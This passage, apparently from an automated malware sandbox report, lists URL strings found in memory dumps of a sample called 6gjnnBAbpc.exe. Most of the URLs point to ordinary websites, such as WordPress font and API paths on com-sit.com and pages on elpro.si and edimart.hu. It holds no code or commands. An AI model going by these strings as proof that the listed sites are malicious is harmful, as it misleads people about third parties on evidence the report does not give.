                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.eot?#iefix
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.svg#Lato
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.woff2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/open-sans-v34-latin_cyrillic-regular.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.eot
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.eot?#iefix
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.svg#Roboto
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.woff2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/upoads/fonts/open-sans-v34-latin_cyrillic-regular.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D9F000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&#038;format=xm
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D9F000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/641
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zh-hans/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421637909.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008DD2000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.305232643.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D80000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.426690555.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#/schema/logo/image/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#breadcrumb
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#organization
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#primaryimage
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#website
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or 